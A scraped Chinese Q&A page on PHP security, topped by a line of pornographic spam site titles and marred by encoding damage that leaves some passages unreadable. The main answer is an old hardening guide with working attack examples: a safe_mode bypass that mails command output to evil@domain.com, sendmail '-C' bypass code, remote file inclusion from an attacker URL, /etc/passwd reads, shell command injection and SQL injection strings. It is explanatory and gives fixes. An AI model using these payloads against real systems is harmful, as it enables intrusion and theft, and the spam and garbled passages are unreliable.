超碰在线天天性国产视频|无码人妻玩麻豆中出一区有奶水|日日日日日日日日日日日日网96|91视频农村妇女网站|精品美女日本一区|日韩无码一区视频|精品素人AV婷婷色视频|日本精品视频手机在线|少妇高清无码一二区|激情四射综合婷婷

貨幣問答:php安全

韓瑛

怎么解決php 代碼安全

您好,所有網(wǎng)頁(yè)的發(fā)展的戒律,我不能再壓縮了的話就是:永遠(yuǎn),永遠(yuǎn),相信你的用戶.假定你的網(wǎng)站從使用者收集的每片數(shù)據(jù)含有惡意代碼. 始終,你認(rèn)為已經(jīng)檢查客戶端驗(yàn)證的這包括數(shù)據(jù),例如在JavaScript .如果你能夠達(dá)到這個(gè)目標(biāo),你應(yīng)該有了一個(gè)良好的開端.如果PHP的安全性很重要,這一點(diǎn)就要重要地學(xué)習(xí).個(gè)人來說,"PHP安全"是一個(gè)重大的問題。2、全局變量在許多語言,你必須明確地設(shè)定一個(gè)變量,以使用它. 在PHP中,有一個(gè)選項(xiàng)" ,register_globals" ,你可以在php.ini中設(shè)置,讓您可以使用全局變量,而不需要事先聲明.考慮下面的代碼:if ($password == "my_password") {$authorized = 1;}if ($authorized == 1) {echo "Lots of important stuff.";}許多人看上去覺得沒什么問題; 而事實(shí)上,這方面的代碼在整個(gè)網(wǎng)站上應(yīng)用.但是,如果一個(gè)服務(wù)器開啟"register_globals"。然后,只需添加"?authorized=1"的URL將讓任何人都看到.這是一個(gè)最普遍的PHP的安全問題.所幸的是,這有兩個(gè)簡(jiǎn)單的解決辦法.第一,也許最好的,就是把"register_globals"關(guān)閉.二是你必須明確只有你使用變量.在上面的例子中,這將意味著加入"?authorized=0"; 在腳本的開始:$authorized = 0;if ($password == "my_password") {$authorized = 1;}if ($authorized == 1) {echo "Lots of important stuff.";}3、錯(cuò)誤信息錯(cuò)誤信息是一個(gè)非常有用的工具,無論是程序員和黑客.開發(fā)者需要它們?nèi)ジ恼e(cuò)誤. 黑客可以利用它們來找出一個(gè)網(wǎng)站的各種信息,從目錄結(jié)構(gòu)的服務(wù)器,數(shù)據(jù)庫(kù)登錄信息.如果可能的話,最好是關(guān)閉所有的錯(cuò)誤報(bào)告. PHP可以完成這項(xiàng)工作.htaccess或php.ini,設(shè)置"error_reporting" 的值改為"0" .如果你有一個(gè)開發(fā)環(huán)境,您可以設(shè)定不同的錯(cuò)誤報(bào)告級(jí)別。

推薦
不推薦
展開
收起
迷離花影

php安全配置 如何配置使其更安全

一、Web服務(wù)器安全PHP其實(shí)不過是Web服務(wù)器的一個(gè)模塊功能,所以首先要保證Web服務(wù)器的安全。當(dāng)然Web服務(wù)器要安全又必須是先保證系統(tǒng)安全,這樣就扯遠(yuǎn)了,無窮無盡。PHP可以和各種Web服務(wù)器結(jié)合,這里也只討論Apache。非常建議以chroot方式安裝啟動(dòng)Apache,這樣即使Apache和PHP及其腳本出現(xiàn)漏洞,受影響的也只有這個(gè)禁錮的系統(tǒng),不會(huì)危害實(shí)際系統(tǒng)。但是使用chroot的Apache后,給應(yīng)用也會(huì)帶來一定的麻煩,比如連接mysql時(shí)必須用127.0.0.1地址使用tcp連接而不能用localhost實(shí)現(xiàn)socket連接,這在效率上會(huì)稍微差一點(diǎn)。還有mail函數(shù)發(fā)送郵件也是個(gè)問題,因?yàn)閜hp.ini里的:[mail function]; For Win32 only.SMTP = localhost; For Win32 only.sendmail_from = me@localhost.com都是針對(duì)Win32平臺(tái),所以需要在chroot環(huán)境下調(diào)整好sendmail。二、PHP本身問題1、遠(yuǎn)程溢出PHP-4.1.2以下的所有版本都存在文件上傳遠(yuǎn)程緩沖區(qū)溢出漏洞,而且攻擊程序已經(jīng)廣泛流傳,成功率非常高:http://packetstormsecurity.org/0204-exploits/7350funhttp://hsj.shadowpenguin.org/misc/php3018_exp.txt2、遠(yuǎn)程拒絕服務(wù)PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請(qǐng)求處理遠(yuǎn)程漏洞,雖然不能獲得本地用戶權(quán)限,但是也能造成拒絕服務(wù)。3、safe_mode繞過漏洞還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數(shù)繞過safe_mode限制執(zhí)行命令漏洞,4.0.5版本開始mail函數(shù)增加了第五個(gè)參數(shù),由于設(shè)計(jì)者考慮不周可以突破safe_mode的限制執(zhí)行命令。其中4.0.5版本突破非常簡(jiǎn)單,只需用分號(hào)隔開后面加shell命令就可以了,比如存在PHP腳本evil.php:<? mail("foo@bar,"foo","bar","",$bar); ?>執(zhí)行如下的URL:http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com這將id執(zhí)行的結(jié)果發(fā)送給evil@domain.com。對(duì)于4.0.6至4.2.2的PHP突破safe_mode限制其實(shí)是利用了sendmail的-C參數(shù),所以系統(tǒng)必須是使用sendmail。如下的代碼能夠突破safe_mode限制執(zhí)行命令:<?# 注意,下面這兩個(gè)必須是不存在的,或者它們的屬主和本腳本的屬主是一樣$script="/tmp/script123";$cf="/tmp/cf123";$fd = fopen($cf, "w");fwrite($fd, "OQ/tmpSparse=0R$*" . chr(9) . "$#local $@ $1 $: $1Mlocal, P=/bin/sh, A=sh $script");fclose($fd);$fd = fopen($script, "w");fwrite($fd, "rm -f $script $cf; ");fwrite($fd, $cmd);fclose($fd);mail("nobody", "", "", "", "-C$cf");?>還是使用以上有問題版本PHP的用戶一定要及時(shí)升級(jí)到最新版本,這樣才能消除基本的安全問題。三、PHP本身的安全配置PHP的配置非常靈活,可以通過php.ini, httpd.conf, .htaccess文件(該目錄必須設(shè)置了AllowOverride All或Options)進(jìn)行設(shè)置,還可以在腳本程序里使用ini_set()及其他的特定的函數(shù)進(jìn)行設(shè)置。通過phpinfo()和get_cfg_var()函數(shù)可以得到配置選項(xiàng)的各個(gè)值。如果配置選項(xiàng)是唯一PHP_INI_SYSTEM屬性的,必須通過php.ini和httpd.conf來修改,它們修改的是PHP的Master值,但修改之后必須重啟apache才能生效。其中php.ini設(shè)置的選項(xiàng)是對(duì)Web服務(wù)器所有腳本生效,httpd.conf里設(shè)置的選項(xiàng)是對(duì)該定義的目錄下所有腳本生效。如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項(xiàng)就可以使用.htaccess文件設(shè)置,也可以通過在腳本程序自身用ini_set()函數(shù)設(shè)定,它們修改的是Local值,改了以后馬上生效。但是.htaccess只對(duì)當(dāng)前目錄的腳本程序生效,ini_set()函數(shù)只對(duì)該腳本程序設(shè)置ini_set()函數(shù)以后的代碼生效。各個(gè)版本的選項(xiàng)屬性可能不盡相同,可以用如下命令查找當(dāng)前源代碼的main.c文件得到所有的選項(xiàng),以及它的屬性:# grep PHP_INI_ /PHP_SRC/main/main.c在討論P(yáng)HP安全配置之前,應(yīng)該好好了解PHP的safe_mode模式。1、safe_modesafe_mode是唯一PHP_INI_SYSTEM屬性,必須通過php.ini或httpd.conf來設(shè)置。要啟用safe_mode,只需修改php.ini:safe_mode = On或者修改httpd.conf,定義目錄:<Directory /var/www>Options FollowSymLinksphp_admin_value safe_mode 1</Directory>重啟apache后safe_mode就生效了。啟動(dòng)safe_mode,會(huì)對(duì)許多PHP函數(shù)進(jìn)行限制,特別是和系統(tǒng)相關(guān)的文件打開、命令執(zhí)行等函數(shù)。所有操作文件的函數(shù)將只能操作與腳本UID相同的文件,比如test.php腳本的內(nèi)容為:<?include("index.html")?>幾個(gè)文件的屬性如下:# ls -latotal 13drwxr-xr-x 2 root root 104 Jul 20 01:25 .drwxr-xr-x 16 root root 384 Jul 18 12:02 ..-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php在瀏覽器請(qǐng)求test.php會(huì)提示如下的錯(cuò)誤信息:Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1如果被操作文件所在目錄的UID和腳本UID一致,那么該文件的UID即使和腳本不同也可以訪問的,不知這是否是PHP的一個(gè)漏洞還是另有隱情。所以php腳本屬主這個(gè)用戶最好就只作這個(gè)用途,絕對(duì)禁止使用root做為php腳本的屬主,這樣就達(dá)不到safe_mode的效果了。如果想將其放寬到GID比較,則打開 safe_mode_gid可以考慮只比較文件的GID,可以設(shè)置如下選項(xiàng):safe_mode_gid = On設(shè)置了safe_mode以后,所有命令執(zhí)行的函數(shù)將被限制只能執(zhí)行php.ini里safe_mode_exec_dir指定目錄里的程序,而且shell_exec、`ls -l`這種執(zhí)行命令的方式會(huì)被禁止。如果確實(shí)需要調(diào)用其它程序,可以在php.ini做如下設(shè)置:safe_mode_exec_dir = /usr/local/php/exec然后拷貝程序到該目錄,那么php腳本就可以用system等函數(shù)來執(zhí)行該程序。而且該目錄里的shell腳本還是可以調(diào)用其它目錄里的系統(tǒng)命令。safe_mode_include_dir string當(dāng)從此目錄及其子目錄(目錄必須在 include_path 中或者用完整路徑來包含)包含文件時(shí)越過 UID/GID 檢查。從 PHP 4.2.0 開始,本指令可以接受和 include_path 指令類似的風(fēng)格用分號(hào)隔開的路徑,而不只是一個(gè)目錄。指定的限制實(shí)際上是一個(gè)前綴,而非一個(gè)目錄名。這也就是說“safe_mode_include_dir = /dir/incl”將允許訪問“/dir/include”和“/dir/incls”,如果它們存在。如果您希望將訪問控制在一個(gè)指定的目錄,那么請(qǐng)?jiān)诮Y(jié)尾加上一個(gè)斜線,例如:“safe_mode_include_dir = /dir/incl/”。safe_mode_allowed_env_vars string設(shè)置某些環(huán)境變罧贍蓯喬痹詰陌踩?笨凇1局噶畎??幸桓齠漢歐指艫那白毫斜懟T詘踩?J較攏?沒е荒芨謀淠切┟?志哂性謖飫鍰峁┑那白旱幕肪潮淞俊D?锨榭魷攏?沒е荒萇柚靡?PHP_ 開頭的環(huán)境變量(例如 PHP_FOO = BAR)。注: 如果本指令為空,PHP 將使用戶可以修改任何環(huán)境變量!safe_mode_protected_env_vars string本指令包含有一個(gè)逗號(hào)分隔的環(huán)境變量的列表,最終用戶不能用 putenv() 來改變這些環(huán)境變量。甚至在 safe_mode_allowed_env_vars 中設(shè)置了允許修改時(shí)也不能改變這些變量。雖然safe_mode不是萬能的(低版本的PHP可以繞過),但還是強(qiáng)烈建議打開安全模式,在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會(huì)有很多限制,可能對(duì)應(yīng)用帶來影響,所以還需要調(diào)整代碼和配置才能和諧。被安全模式限制或屏蔽的函數(shù)可以參考PHP手冊(cè)。討論完safe_mode后,下面結(jié)合程序代碼實(shí)際可能出現(xiàn)的問題討論如何通過對(duì)PHP服務(wù)器端的配置來避免出現(xiàn)的漏洞。2、變量濫用PHP默認(rèn)register_globals = On,對(duì)于GET, POST, Cookie, Environment, Session的變罧梢災(zāi)苯幼⒉岢扇?直淞俊K?塹淖⒉崴承蚴莢ariables_order = "EGPCS"(可以通過php.ini修改),同名變量variables_order右邊的覆蓋左邊,所以變量的濫用極易造成程序的混亂。而且腳本程序員往往沒有對(duì)變量初始化的習(xí)慣,像如下的程序片斷就極易受到攻擊:<?//test_1.phpif ($pass == "hello")$auth = 1;if ($auth == 1)echo "some important information";elseecho "nothing";?>攻擊者只需用如下的請(qǐng)求就能繞過檢查:http://victim/test_1.php?auth=1這雖然是一個(gè)很弱智的錯(cuò)誤,但一些著名的程序也有犯過這種錯(cuò)誤,比如phpnuke的遠(yuǎn)程文件拷貝漏洞http://www.securityfocus.com/bid/3361PHP-4.1.0發(fā)布的時(shí)候建議關(guān)閉register_globals,并提供了7個(gè)特殊的數(shù)組變量來使用各種變量。對(duì)于從GET、POST、COOKIE等來的變量并不會(huì)直接注冊(cè)成變量,必需通過數(shù)組變量來存取。PHP-4.2.0發(fā)布的時(shí)候,php.ini默認(rèn)配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認(rèn)值,一般為0,避免了攻擊者控制判斷變量。解決方法:配置文件php.ini設(shè)置register_globals = Off。要求程序員對(duì)作為判斷的變量在程序最開始初始化一個(gè)值。3、文件打開極易受攻擊的代碼片斷:<?//test_2.phpif (!($str = readfile("$filename"))) {echo("Could not open file: $filename<BR>\n");exit;}else {echo $str;}?>由于攻擊者可以指定任意的$filename,攻擊者用如下的請(qǐng)求就可以看到/etc/passwd:http://victim/test_2.php?filename=/etc/passwd如下請(qǐng)求可以讀php文件本身:http://victim/test_2.php?filename=test_2.phpPHP中文件打開函數(shù)還有fopen(), file()等,如果對(duì)文件名變量檢查不嚴(yán)就會(huì)造成服務(wù)器重要文件被訪問讀取。解決方法:如非特殊需要,把php的文件操作限制在web目錄里面。以下是修改apache配置文件httpd.conf的一個(gè)例子:<Directory /usr/local/apache/htdocs>php_admin_value open_basedir /usr/local/apache/htdocs</Directory>重啟apache后,/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了,否則PHP就會(huì)報(bào)錯(cuò):Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.使用safe_mode模式也能避免這種問題,前面已經(jīng)討論過了。4、包含文件極易受攻擊的代碼片斷:<?//test_3.phpif(file_exists($filename))include("$filename");?>這種不負(fù)責(zé)任的代碼會(huì)造成相當(dāng)大的危害,攻擊者用如下請(qǐng)求可以得到/etc/passwd文件:http://victim/test_3.php?filename=/etc/passwd如果對(duì)于Unix版的PHP(Win版的PHP不支持遠(yuǎn)程打開文件)攻擊者可以在自己開了http或ftp服務(wù)的機(jī)器上建立一個(gè)包含shell命令的文件,http://attack/attack.txt的內(nèi)容是<?passthru("ls /etc")?>,那么如下的請(qǐng)求就可以在目標(biāo)主機(jī)執(zhí)行命令ls /etc:http://victim/test_3.php?filename=http://attack/attack.txt攻擊者甚至可以通過包含apache的日志文件access.log和error.log來得到執(zhí)行命令的代碼,不過由于干擾信息太多,有時(shí)不易成功。對(duì)于另外一種形式,如下代碼片斷:<?//test_4.phpinclude("$lib/config.php");?>攻擊者可以在自己的主機(jī)建立一個(gè)包含執(zhí)行命令代碼的config.php文件,然后用如下請(qǐng)求也可以在目標(biāo)主機(jī)執(zhí)行命令:http://victim/test_4.php?lib=http://attackPHP的包含函數(shù)有include(), include_once(), require(), require_once。如果對(duì)包含文件名變量檢查不嚴(yán)就會(huì)對(duì)系統(tǒng)造成嚴(yán)重危險(xiǎn),可以遠(yuǎn)程執(zhí)行命令。解決方法:要求程序員包含文件里的參數(shù)盡量不要使用變量,如果使用變量,就一定要嚴(yán)格檢查要包含的文件名,絕對(duì)不能由用戶任意指定。如前面文件打開中限制PHP操作路徑是一個(gè)必要的選項(xiàng)。另外,如非特殊需要,一定要關(guān)閉PHP的遠(yuǎn)程文件打開功能。修改php.ini文件:allow_url_fopen = Off重啟apache。5、文件上傳php的文件上傳機(jī)制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時(shí)目錄(默認(rèn)是系統(tǒng)的臨時(shí)目錄,如:/tmp)里的一個(gè)類似phpxXuoXG的隨機(jī)臨時(shí)文件,程序執(zhí)行結(jié)束,該臨時(shí)文件也被刪除。PHP給上傳的文件定義了四個(gè)變量:(如form變量名是file,而且register_globals打開)$file #就是保存到服務(wù)器端的臨時(shí)文件(如/tmp/phpxXuoXG )$file_size #上傳文件的大小$file_name #上傳文件的原始名稱$file_type #上傳文件的類型推薦使用:$HTTP_POST_FILES[file][tmp_name]$HTTP_POST_FILES[file][size]$HTTP_POST_FILES[file][name]$HTTP_POST_FILES[file][type]這是一個(gè)最簡(jiǎn)單的文件上傳代碼:<?//test_5.phpif(isset($upload) && $file != "none") {copy($file, "/usr/local/apache/htdocs/upload/".$file_name);echo "文件".$file_name."上傳成功!點(diǎn)擊<a href=\"$PHP_SELF\">繼續(xù)上傳</a>";exit;}?><html><head><title>文件上傳</title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head><body bgcolor="#FFFFFF"><form enctype="multipart/form-data" method="post">上傳文件:<input type="file" name="file" size="30"><input type="submit" name="upload" value="上傳"></form></body></html>這樣的上傳代碼存在讀取任意文件和執(zhí)行命令的重大問題。下面的請(qǐng)求可以把/etc/passwd文檔拷貝到web目錄/usr/local/apache/htdocs/test(注意:這個(gè)目錄必須nobody可寫)下的attack.txt文件里:http://victim/test_5.php?upload= ... ile_name=attack.txt然后可以用如下請(qǐng)求讀取口令文件:http://victim/test/attack.txt攻擊者可以把php文件拷貝成其它擴(kuò)展名,泄漏腳本源代碼。攻擊者可以自定義form里file_name變量的值,上傳覆蓋任意有寫權(quán)限的文件。攻擊者還可以上傳PHP腳本執(zhí)行主機(jī)的命令。解決方法:PHP-4.0.3以后提供了is_uploaded_file和move_uploaded_file函數(shù),可以檢查操作的文件是否是用戶上傳的文件,從而避免把系統(tǒng)文件拷貝到web目錄。使用$HTTP_POST_FILES數(shù)組來讀取用戶上傳的文件變量。嚴(yán)格檢查上傳變量。比如不允許是php腳本文件。把PHP腳本操作限制在web目錄可以避免程序員使用copy函數(shù)把系統(tǒng)文件拷貝到web目錄。move_uploaded_file不受open_basedir的限制,所以不必修改php.ini里upload_tmp_dir的值。把PHP腳本用phpencode進(jìn)行加密,避免由于copy操作泄漏源碼。嚴(yán)格配置文件和目錄的權(quán)限,只允許上傳的目錄能夠讓nobody用戶可寫。對(duì)于上傳目錄去掉PHP解釋功能,可以通過修改httpd.conf實(shí)現(xiàn):<Directory /usr/local/apache/htdocs/upload>php_flag engine off#如果是php3換成php3_engine off</Directory>重啟apache,upload目錄的php文件就不能被apache解釋了,即使上傳了php文件也沒有問題,只能直接顯示源碼。6、命令執(zhí)行下面的代碼片斷是從PHPNetToolpack摘出,詳細(xì)的描述見:http://www.securityfocus.com/bid/4303<?//test_6.phpsystem("traceroute $a_query",$ret_strs);?>由于程序沒有過濾$a_query變量,所以攻擊者可以用分號(hào)來追加執(zhí)行命令。攻擊者輸入如下請(qǐng)求可以執(zhí)行cat /etc/passwd命令:http://victim/test_6.php?a_query=www.example.com;cat /etc/passwdPHP的命令執(zhí)行函數(shù)還有system(), passthru(), popen()和``等。命令執(zhí)行函數(shù)非常危險(xiǎn),慎用。如果要使用一定要嚴(yán)格檢查用戶輸入。解決方法:要求程序員使用escapeshellcmd()函數(shù)過濾用戶輸入的shell命令。啟用safe_mode可以杜絕很多執(zhí)行命令的問題,不過要注意PHP的版本一定要是最新的,小于PHP-4.2.2的都可能繞過safe_mode的限制去執(zhí)行命令。7、sql_inject如下的SQL語句如果未對(duì)變量進(jìn)行處理就會(huì)存在問題:select * from login where user=$user and pass=$pass攻擊者可以用戶名和口令都輸入1 or 1=1繞過驗(yàn)證。不過幸虧PHP有一個(gè)默認(rèn)的選項(xiàng)magic_quotes_gpc = On,該選項(xiàng)使得從GET, POST, COOKIE來的變量自動(dòng)加了addslashes()操作。上面SQL語句變成了:select * from login where user=1\ or 1=\1 and pass=1\ or 1=\1從而避免了此類sql_inject攻擊。對(duì)于數(shù)字類型的字段,很多程序員會(huì)這樣寫:select * from test where id=$id由于變量沒有用單引號(hào)擴(kuò)起來,就會(huì)造成sql_inject攻擊。幸虧MySQL功能簡(jiǎn)單,沒有sqlserver等數(shù)據(jù)庫(kù)有執(zhí)行命令的SQL語句,而且PHP的mysql_query()函數(shù)也只允許執(zhí)行一條SQL語句,所以用分號(hào)隔開多條SQL語句的攻擊也不能奏效。但是攻擊者起碼還可以讓查詢語句出錯(cuò),泄漏系統(tǒng)的一些信息,或者一些意想不到的情況。解決方法:要求程序員對(duì)所有用戶提交的要放到SQL語句的變量進(jìn)行過濾。即使是數(shù)字類型的字段,變量也要用單引號(hào)擴(kuò)起來,MySQL自己會(huì)把字串處理成數(shù)字。在MySQL里不要給PHP程序高級(jí)別權(quán)限的用戶,只允許對(duì)自己的庫(kù)進(jìn)行操作,這也避免了程序出現(xiàn)問題被 SELECT INTO OUTFILE ... 這種攻擊。8、警告及錯(cuò)誤信息PHP默認(rèn)顯示所有的警告及錯(cuò)誤信息:error_reporting = E_ALL & ~E_NOTICEdisplay_errors = On在平時(shí)開發(fā)調(diào)試時(shí)這非常有用,可以根據(jù)警告信息馬上找到程序錯(cuò)誤所在。正式應(yīng)用時(shí),警告及錯(cuò)誤信息讓用戶不知所措,而且給攻擊者泄漏了腳本所在的物理路徑,為攻擊者的進(jìn)一步攻擊提供了有利的信息。而且由于自己沒有訪問到錯(cuò)誤的地方,反而不能及時(shí)修改程序的錯(cuò)誤。所以把PHP的所有警告及錯(cuò)誤信息記錄到一個(gè)日志文件是非常明智的,即不給攻擊者泄漏物理路徑,又能讓自己知道程序錯(cuò)誤所在。修改php.ini中關(guān)于Error handling and logging部分內(nèi)容:error_reporting = E_ALLdisplay_errors = Offlog_errors = Onerror_log = /usr/local/apache/logs/php_error.log然后重啟apache,注意文件/usr/local/apache/logs/php_error.log必需可以讓nobody用戶可寫。9、disable_functions如果覺得有些函數(shù)還有威脅,可以設(shè)置php.ini里的disable_functions(這個(gè)選項(xiàng)不能在httpd.conf里設(shè)置),比如:disable_functions = phpinfo, get_cfg_var可以指定多個(gè)函數(shù),用逗號(hào)分開。重啟apache后,phpinfo, get_cfg_var函數(shù)都被禁止了。建議關(guān)閉函數(shù)phpinfo, get_cfg_var,這兩個(gè)函數(shù)容易泄漏服務(wù)器信息,而且沒有實(shí)際用處。10、disable_classes這個(gè)選項(xiàng)是從PHP-4.3.2開始才有的,它可以禁用某些類,如果有多個(gè)用逗號(hào)分隔類名。disable_classes也不能在httpd.conf里設(shè)置,只能在php.ini配置文件里修改。11、open_basedir前面分析例程的時(shí)候也多次提到用open_basedir對(duì)腳本操作路徑進(jìn)行限制,這里再介紹一下它的特性。用open_basedir指定的限制實(shí)際上是前綴,不是目錄名。也就是說 "open_basedir = /dir/incl" 也會(huì)允許訪問 "/dir/include" 和 "/dir/incls",如果它們存在的話。如果要將訪問限制在僅為指定的目錄,用斜線結(jié)束路徑名。例如:"open_basedir = /dir/incl/"??梢栽O(shè)置多個(gè)目錄,在Windows中,用分號(hào)分隔目錄。在任何其它系統(tǒng)中用冒號(hào)分隔目錄。作為Apache模塊時(shí),父目錄中的open_basedir路徑自動(dòng)被繼承。四、其它安全配置1、取消其它用戶對(duì)常用、重要系統(tǒng)命令的讀寫執(zhí)行權(quán)限一般管理員維護(hù)只需一個(gè)普通用戶和管理用戶,除了這兩個(gè)用戶,給其它用戶能夠執(zhí)行和訪問的東西應(yīng)該越少越好,所以取消其它用戶對(duì)常用、重要系統(tǒng)命令的讀寫執(zhí)行權(quán)限能在程序或者服務(wù)出現(xiàn)漏洞的時(shí)候給攻擊者帶來很大的迷惑。記住一定要連讀的權(quán)限也去掉,否則在linux下可以用/lib/ld-linux.so.2 /bin/ls這種方式來執(zhí)行。如果要取消某程如果是在chroot環(huán)境里,這個(gè)工作比較容易實(shí)現(xiàn),否則,這項(xiàng)工作還是有些挑戰(zhàn)的。因?yàn)槿∠恍┏绦虻膱?zhí)行權(quán)限會(huì)導(dǎo)致一些服務(wù)運(yùn)行不正常。PHP的mail函數(shù)需要/bin/sh去調(diào)用sendmail發(fā)信,所以/bin/bash的執(zhí)行權(quán)限不能去掉。這是一項(xiàng)比較累人的工作,2、去掉apache日志其它用戶的讀權(quán)限apache的access-log給一些出現(xiàn)本地包含漏洞的程序提供了方便之門。通過提交包含PHP代碼的URL,可以使access-log包含PHP代碼,那么把包含文件指向access-log就可以執(zhí)行那些PHP代碼,從而獲得本地訪問權(quán)限。如果有其它虛擬主機(jī),也應(yīng)該相應(yīng)去掉該日志文件其它用戶的讀權(quán)限。當(dāng)然,如果你按照前面介紹的配置PHP那么一般已經(jīng)是無法讀取日志文件了。

推薦
不推薦
展開
收起
張裔

php配置文件安全問題!

你的服務(wù)器上面的php配置文件里面file_get_contents()可以讀取文件內(nèi)容,只能說明你可以在你的服務(wù)器上面讀取其他的文件內(nèi)容,比如:你可以讀取你服務(wù)器上面你有權(quán)限讀取的文件。至于你能不能讀取別的服務(wù)器上面的文件?1。要看別的服務(wù)器上面的配置2。對(duì)于你讀取別的服務(wù)器上面的php文件,只是讀取到那個(gè)php文件執(zhí)行后的結(jié)果,就好像你在瀏覽器上面訪問別的服務(wù)器上面的php,得到的只能是那個(gè)php文件執(zhí)行后的頁(yè)面結(jié)果,是不能讀取到那個(gè)php文件的源碼的。

推薦
不推薦
展開
收起
譚悟真

PHP代碼安全應(yīng)該看什么樣子的書

介紹一下我個(gè)人學(xué)習(xí)PHP的過程:1、買本PHP基礎(chǔ)知識(shí)書籍;2、下載DISCUZ論壇并安裝,研究DISCUZ論壇的代碼,邊看邊學(xué)習(xí),涉及到各函數(shù)可查詢PHP手冊(cè)(http://www.51windows.net/)

推薦
不推薦
展開
收起
魏七

php開發(fā)出來的網(wǎng)站安全性高嗎?

可以,但是適合自己!

推薦
不推薦
展開
收起
劉欣

使用PHP如何實(shí)現(xiàn)高效安全的ftp服務(wù)器

FTP服務(wù)器想必大家都不陌生,使用起來,現(xiàn)成的軟件也很多。不過免費(fèi)的軟件功能有時(shí)候并不符合自己需求,又無法二次開發(fā),付費(fèi)軟件價(jià)格又比較高昂。PHP的swoole擴(kuò)展,是PHP語言的高性能網(wǎng)絡(luò)通信框架,提供了PHP語言的異步多線程服務(wù)器,異步TCP/UDP網(wǎng)絡(luò)客戶端,異步MySQL,數(shù)據(jù)庫(kù)連接池,AsyncTask,消息隊(duì)列,毫秒定時(shí)器,異步文件讀寫,異步DNS查詢。

推薦
不推薦
展開
收起
解脫庵

php線程安全和不安全的區(qū)別

Windows下的PHP版本分兩種:線程安全版本與非線程安全版本。要論兩者的區(qū)別,詳細(xì)論說起來比較麻煩,從使用者的角度,記住什么時(shí)候用哪種版本的區(qū)別就可以了吧:1、windows + IIS + FastCGI :使用非線程安全版本。解釋:以FastCGI方式安裝PHP時(shí),PHP擁有獨(dú)立的進(jìn)程,并且FastCGI是單一線程的,不存在多個(gè)線程之間可能引發(fā)的相互干擾(這種干擾通常都是由于全局變量和靜態(tài)變量導(dǎo)致的)。由于省去了線程安全的檢查,因此使用FastCGI方式比ISAPI方式的效率更高一些。2、windows + IIS + ISAPI :使用線程安全版本。解釋:PHP以ISAPI方式安裝時(shí),PHP沒有獨(dú)立的進(jìn)程,而是作為DLL被IIS加載運(yùn)行的,即是依附于Web服務(wù)器進(jìn)程的。當(dāng)Web服務(wù)器運(yùn)行在多線程模式下(IIS正是這種情況),PHP自然也就運(yùn)行在多線程模式下。只要是在多線程模式下運(yùn)行,就可能存在線程安全問題,因此應(yīng)選擇PHP的線程安全版本。3、windows + Apache + PHP(模塊) :使用線程安全版本。解釋:如果你要在Apache中以模塊方式安裝PHP,則你應(yīng)該使用PHP的線程安全的版本。原因是當(dāng)PHP作為Apache的模塊安裝時(shí),PHP沒有獨(dú)立的進(jìn)程,而是作為模塊以DLL的形式被加載到Apache中的,是隨Apache的啟動(dòng)而啟動(dòng)的,而Windows下的Apache為多線程工作模式,因此PHP自然也就運(yùn)行在多線程模式下。因此,這種情況下應(yīng)使用PHP的線程安全版本。4、windows + Apache + PHP(ISAPI) :使用線程安全版本。解釋:由于以ISAPI方式來安裝PHP時(shí),PHP也沒有獨(dú)立的進(jìn)程,也是作為模塊被加載到Apache中的,因此,同樣也需要使用PHP的線程安全版本。一般不建議在Apache中以ISAPI方式來安裝PHP,原因是到目前為止,Apache通過mod_isapi.so模塊來實(shí)現(xiàn)的ISAPI功能并不完整,并未完整實(shí)現(xiàn)微軟對(duì)ISAPI所制定的全部規(guī)范。5、windows + Apache + PHP(FastCGI) :使用非線程安全版本。解釋:如果你要在Apache中以FastCGI方式使用PHP,則同在IIS中使用FastCGI的PHP的情況一樣,你應(yīng)該使用PHP的非線程安全的版本。原因是在Apache中以FastCGI方式安裝PHP時(shí),PHP擁有獨(dú)立的進(jìn)程,并且FastCGI是單一線程的,故應(yīng)使用PHP的非線程安全版本以提高性能

推薦
不推薦
展開
收起
萬松嶺

Windows下的PHP安裝文件線程安全和非線程安全的區(qū)別

Windows下的PHP版本分兩種:線程安全版本與非線程安全版本。要論兩者的區(qū)別,詳細(xì)論說起來比較麻煩,從使用者的角度,記住什么時(shí)候用哪種版本的區(qū)別就可以了吧:1、windows + IIS + FastCGI :使用非線程安全版本。解釋:以FastCGI方式安裝PHP時(shí),PHP擁有獨(dú)立的進(jìn)程,并且FastCGI是單一線程的,不存在多個(gè)線程之間可能引發(fā)的相互干擾(這種干擾通常都是由于全局變量和靜態(tài)變量導(dǎo)致的)。由于省去了線程安全的檢查,因此使用FastCGI方式比ISAPI方式的效率更高一些。2、windows + IIS + ISAPI :使用線程安全版本。解釋:PHP以ISAPI方式安裝時(shí),PHP沒有獨(dú)立的進(jìn)程,而是作為DLL被IIS加載運(yùn)行的,即是依附于Web服務(wù)器進(jìn)程的。當(dāng)Web服務(wù)器運(yùn)行在多線程模式下(IIS正是這種情況),PHP自然也就運(yùn)行在多線程模式下。只要是在多線程模式下運(yùn)行,就可能存在線程安全問題,因此應(yīng)選擇PHP的線程安全版本。3、windows + Apache + PHP(模塊) :使用線程安全版本。解釋:如果你要在Apache中以模塊方式安裝PHP,則你應(yīng)該使用PHP的線程安全的版本。原因是當(dāng)PHP作為Apache的模塊安裝時(shí),PHP沒有獨(dú)立的進(jìn)程,而是作為模塊以DLL的形式被加載到Apache中的,是隨Apache的啟動(dòng)而啟動(dòng)的,而Windows下的Apache為多線程工作模式,因此PHP自然也就運(yùn)行在多線程模式下。因此,這種情況下應(yīng)使用PHP的線程安全版本。4、windows + Apache + PHP(ISAPI) 